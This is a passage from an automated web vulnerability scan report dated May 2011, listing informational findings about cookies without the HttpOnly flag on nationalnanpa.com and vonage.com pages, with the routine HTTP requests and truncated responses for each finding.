GET /content/img/nav_pub_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:30 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "28778-543-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1347
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a.........I..B..H..F..D..D..E..C..G............A.r...A.uA.sq..A.rA.t......A.q...@.qA.t....................P..S...A.v1.g..Q .Y..N1.ha..0.ea..!._...a.....l....Sa..l..l..q....Pl..Q....1.jq....V!.`1
...[SNIP]...

13.80. http://www.nationalnanpa.com/content/img/nav_rep_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_rep_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_rep_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:32 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "2878a-502-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1282
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a.........X.{Q..W.~S.|R.S..U..T..V......E.}............E.|t..E..E.~.._t.......^d......a......5.s...t.....%.lE.d.......\.............d....^d..%.f...5.u5.t%.j...E.|..g5.vt..5.s%.i.........%.g5
...[SNIP]...

13.81. http://www.nationalnanpa.com/content/img/nav_rep_on.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_rep_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_rep_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a0035-502-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1282
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........I..B..H..D..C..D..F..E..G.........A.rq.....@.q......A.u...A.s...........Qa.......S.....P1.gq..A.ta........q....N!._......A.r...l.....!.]a..l....Pl..l.. .Y1.h...1.i..S......A.q..V!.Z....
...[SNIP]...

13.82. http://www.nationalnanpa.com/content/img/nav_tools_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_tools_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_tools_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:32 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "a0026-491-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1169
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........X.{Q..W.|R..T..U.S.~S..V..................t..E.}t.......5.t5.s......E..E.|..a..^..\E.~.._...%.l.....E...%.f...d.....d....d..gE.E..5.u.....^%.ht..5.r%.i...d..%.g5.v..^E.|...d......
...[SNIP]...

13.83. http://www.nationalnanpa.com/content/img/nav_tools_on.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_tools_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_tools_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:35 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a0036-491-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1169
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........B..I..H..C..F..E..D..D..G......q..............A.u1.g.........1.h...A.r@.q..P..Q..S...A.s..N...A.tl.. .Yl..l..l.......V!._a..q.............Sa..A.t!.[...A.vA.r!.\A.q1.i..Pa.....q..1.ja..1
...[SNIP]...

13.84. http://www.nationalnanpa.com/content/img/subContent_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/subContent_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/subContent_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:27 GMT
ETag: "a004f-5c-471ab6ce2ecc0"
Accept-Ranges: bytes
Content-Length: 92
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a......................................................!.......,.........    . 1H    .h...;

13.85. http://www.nationalnanpa.com/content/js/browser_ie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/js/browser_ie.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/js/browser_ie.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:27 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:28 GMT
ETag: "28755-248a-471ab6cf22f00"
Accept-Ranges: bytes
Content-Length: 9354
Content-Type: application/javascript
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

q58="style.visibility=\"visible\"";q59="style.visibility=\"hidden\"";q82=null;q93=null;q94=null;q95=null;strict=(q147)&&(document.compatMode=="CSS1Compat");if((q150)&&(document.doctype)){tval=document
...[SNIP]...

13.86. http://www.nationalnanpa.com/content/js/dqm_loader.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/js/dqm_loader.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/js/dqm_loader.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:23 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:29 GMT
ETag: "2875f-d36-471ab6d017140"
Accept-Ranges: bytes
Content-Length: 3382
Content-Type: application/javascript
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

q18=0;q19=new Array();q61 =false;q105=null;q123=false;textSize=0;b1="window";b2="";b3="";b4="";c1="";d1="";b2="host";b3="name";c1=String.fromCharCode(99);d1=String.fromCharCode(100);if(document.all ||
...[SNIP]...

13.87. http://www.nationalnanpa.com/content/js/nanpa_nav.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/js/nanpa_nav.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/js/nanpa_nav.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:14 GMT
Server: Apache
Last-Modified: Wed, 15 Sep 2010 18:21:30 GMT
ETag: "a0015-4331-4905066017e80"
Accept-Ranges: bytes
Content-Length: 17201
Content-Type: application/javascript
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

// QuickMenu Pro, Copyright (c) 1998 - 2003, OpenCube Inc. - http://www.opencube.com
//
//
// QuickMenu Pro is Compatible With....
//
// IE4, IE5.x, IE6 (Win 95, 98, ME, 2000, NT, XP)
/
...[SNIP]...

13.88. http://www.nationalnanpa.com/content/styles/nanpa_css_b.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/styles/nanpa_css_b.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/styles/nanpa_css_b.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:03 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:35:11 GMT
ETag: "28792-2cfd-4871ef38215c0"
Accept-Ranges: bytes
Content-Length: 11517
Content-Type: text/css
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

/* NANPA Stylesheet */
/* NeuStar (www.neustar.biz) */

/* General Site Structure */
body {
   background:#CDCDC5 url(/content/img/mainbg.gif) repeat-x top left;
   margin:0;
   padding:0;
   text-align:cente
...[SNIP]...

13.89. http://www.nationalnanpa.com/content/styles/nanpa_css_nav.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/styles/nanpa_css_nav.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/styles/nanpa_css_nav.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:07 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 18:03:17 GMT
ETag: "a001c-6ba-486e227e6a340"
Accept-Ranges: bytes
Content-Length: 1722
Content-Type: text/css
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

/* NANPA Stylesheet - Navigation */
/* NeuStar (www.neustar.biz) */

div.menuBar,
div.menuBar a.menuButton,
div.menu,
div.menu a.menuItem {
font-family: "MS Sans Serif", Arial, sans-serif;
font-si
...[SNIP]...

13.90. http://www.nationalnanpa.com/content/styles/nanpa_css_p.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/styles/nanpa_css_p.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/styles/nanpa_css_p.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:04 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:30 GMT
ETag: "a001b-17d-471ab6d10b380"
Accept-Ranges: bytes
Content-Length: 381
Content-Type: text/css
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

body {    
   font-family: Times, Times New Roman, serif;
   font-size: 12pt;
   background-color: #fff;
   margin:5px;
}

#banner {
   height:33px;
   background-color:#006384;
}

#content {
   margin:5px;
}

a:link,
...[SNIP]...

13.91. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /nas/public/assigned_code_query_step1.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/assigned_code_query_step1.do?method=selectNpas HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:12:32 GMT
Server: Apache
Set-Cookie: nanpaid=n9JhNL0QhPD1Fl4s2fQT8NrBVk0FBlYLJJHWG8dys0vSvJ5DMwWS!1521367000; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/
Content-Length: 18894


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...

13.92. http://www.nationalnanpa.com/nas/public/css/images/layout/list.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /nas/public/css/images/layout/list.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/css/images/layout/list.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:07:14 GMT
Server: Apache
Content-Length: 1214
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

13.93. http://www.nationalnanpa.com/nas/public/css/neustar.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /nas/public/css/neustar.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/css/neustar.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:28 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 7458
Last-Modified: Tue, 11 May 2010 09:16:54 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/css
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

body {
   margin:0;
   padding:0;
}

small.errMesg {
   FONT-WEIGHT: bold;
   FONT-SIZE: 8pt;
   COLOR: red;
FONT-FAMILY: Arial, Helvetica, Geneva, Swiss, SunSans-Regular
}

.logo {
   position: absolute;
   to
...[SNIP]...

13.94. http://www.nationalnanpa.com/nas/public/images/nanpa_hp_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /nas/public/images/nanpa_hp_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/images/nanpa_hp_logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:13 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 514
Last-Modified: Wed, 28 Apr 2010 15:20:28 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89af.!.......V.u...x.........S?4lZ......g..Exh$_L.......G1!.......,....f.!......I..8....`(.di.h..l..p,.tm.x..|n8@..P!....A......Q....."....,.....f..`.2p$....0.......f..._.
..    H......    Y..@t....mf...
...[SNIP]...

13.95. http://www.nationalnanpa.com/nas/public/images/neustar_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /nas/public/images/neustar_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/images/neustar_logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:13 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1679
Last-Modified: Wed, 28 Apr 2010 15:21:12 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89aQ...............@..\........e.......tJ.X...............-.ro.......]..Y.....[P....__.X.....d...D..'.n..h{.X..cV.....L.....f.X.....f+.qs..c..    .Z0.td..u..F..........\........`...M..G...............
...[SNIP]...

13.96. http://www.nationalnanpa.com/nas/public/images/px_CCCCCC.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /nas/public/images/px_CCCCCC.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/images/px_CCCCCC.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:13 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 43
Last-Modified: Sun, 25 Jan 2004 16:15:44 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.............!.......,...........D..;

13.97. http://www.nationalnanpa.com/nas/public/js/utilities.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /nas/public/js/utilities.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/js/utilities.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:12 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 3252
Last-Modified: Fri, 19 Sep 2008 10:26:54 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

// Move the selected items from list box1 to box2
function moveWithRefresh(lstbox1,lstbox2,doRefresh)
{
var box1Count = lstbox1.options.length;
for(var i=0; i < box1Count; i++)
{
   if ( l
...[SNIP]...

13.98. http://www.vonage-forum.com/forum8.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage-forum.com
Path:   /forum8.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forum8.html HTTP/1.1
Host: www.vonage-forum.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:45:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.4
X-Cache: cache vv2.1 - mysql
X-CacheDebug-1: Cache has been disabled!
Cache-Control: no-cache, pre-check=0, post-check=0
Expires: 0
Pragma: no-cache
X-CacheDebug-2: Callback happened
ETag: "d-876637965.92489"
Vary: Accept-Encoding
Set-Cookie: phpbb2mysq_data=a%3A0%3A%7B%7D; expires=Fri, 11-May-2012 00:45:47 GMT; path=/; domain=www.vonage-forum.com
Set-Cookie: phpbb2mysq_sid=29e8b9dde66ce8864ecccdb3ea46feae; path=/; domain=www.vonage-forum.com
Content-Type: text/html
Content-Length: 92489

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Vonage LNP . Local Number Portability Forum</title>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=IS
...[SNIP]...

13.99. http://www.vonage.com/lp/US/afflpdc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /lp/US/afflpdc/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lp/US/afflpdc/?refer_id=AFLGN090801001W1&promo_id=USVONRP2499NSC_WEB&deviceType=VDV21_FREE_UPSELL HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:50:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: refer_id=AFLGN090801001W1; expires=Fri, 27-May-2011 00:50:29 GMT; path=/; domain=.vonage.com
Location: http://www.vonage.com/lp/US/afflpdc/index.php
Set-Cookie: LP=1%7E%7E; expires=Wed, 10-Aug-2011 00:50:30 GMT; path=/; domain=.vonage.com
Content-Type: text/html
Content-Length: 18264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

13.100. http://www.vonage.com/lp/US/afflpdc/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /lp/US/afflpdc/index.php

Issue detail

